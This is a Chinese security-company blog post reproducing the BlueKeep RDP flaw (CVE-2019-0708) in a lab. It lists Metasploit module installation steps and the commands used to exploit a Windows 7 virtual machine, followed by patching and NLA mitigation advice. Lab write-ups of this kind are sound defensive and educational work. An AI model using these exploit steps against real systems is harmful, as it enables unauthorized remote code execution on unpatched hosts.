领信未来
您信赖的网络安全专家

微软RDP远程代码执行漏洞(CVE-2019-0708)复现

概述

2019年5月14日,微软发布了本月安全更新补丁,其中修复了远程桌面协议(RDP)远程代码执行漏洞。未经身份验证的攻击者利用该漏洞,向目标Windows主机发送恶意构造请求,可以在目标系统上执行任意代码。由于该漏洞存在于RDP协议的预身份验证阶段,因此漏洞利用无需进行用户交互操作。该漏洞存在被不法分子利用进行蠕虫攻击的可能。

2019年9月7日凌晨网络上出现此漏洞EXP,根据说明此EXP目前只针对Windows 7 64位和 Windows Server 2008 X64系统,目前该EXP发布在Github的Pull Requests还没有增加到Metasploit官方的框架之中

漏洞复现

工具:kali Metasploit

靶机:win7 x64SP1

添加漏洞利用文件

rdp.rb替换/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb替换/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb替换/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb放到modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

启动 Metasploit 执行reload_all加载漏洞模块

执行use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

options 查看需要设置的参数

show targets 查看targets对应的系统值

设置攻击参数,目标靶机是在Wmwarer里创建的虚拟机IP地址为192.168.91.145,具体参数如下

set RHOSTS 192.168.91.145
set target 3
run

显示攻击成功

修复建议

  1. 安装微软发布的安全更新补丁

Microsoft官方已经在 2019年5月14日修复了该漏洞,用户可以通过安装微软的安全更新来给系统打上安全补丁,下载地址为:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

以及为已不受微软更新支持的系统(Windows Server 2003和Windows XP)提供的安全更新,下载地址:https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708

2. 在无法及时安装微软安全更新的情况下作为临时性解决方案

若用户不需要用到远程桌面服务,建议禁用该服务。

如果由于某些原因安装补丁不成功,或者因为其他原因不能安装补丁,建议采取缓解措施,win7或win server 2008 r2里选择“我的电脑”→“属性”→“远程设置”→“远程”,启用网路级认证(NLA)

参考链接

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708
https://github.com/rapid7/metasploit-framework/pull/12283

关于领信

    陕西领信未来信息科技有限公司是一家主要面向铁路、科研院所、大型企业等行业的网络安全集成和网络安全技术支持服务及相关应用的专业化信息技术企业。成立于2003年。多年来为用户提供从方案设计、工程实施到售后技术服务的全面技术支持,具有健全的运营体制和现代企业理念 , 公司成立以来,业绩显著,成功完成了多项网络安全建设项目,建立了完善的客户服务系统,赢得了广大客户的赞誉和信赖。在信息安全、网络应急服务实施过程中,领信未来已发展成为陕西省内信息安全技术领域颇具实力的企业之一

业务范围

安全服务、应急响应、渗透测试、系统集成

联系方式

电话:029-88235366

邮箱:liujj@linktrust.net

赞(6)
未经允许不得转载:陕西领信未来信息科技有限公司 » 微软RDP远程代码执行漏洞(CVE-2019-0708)复现

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址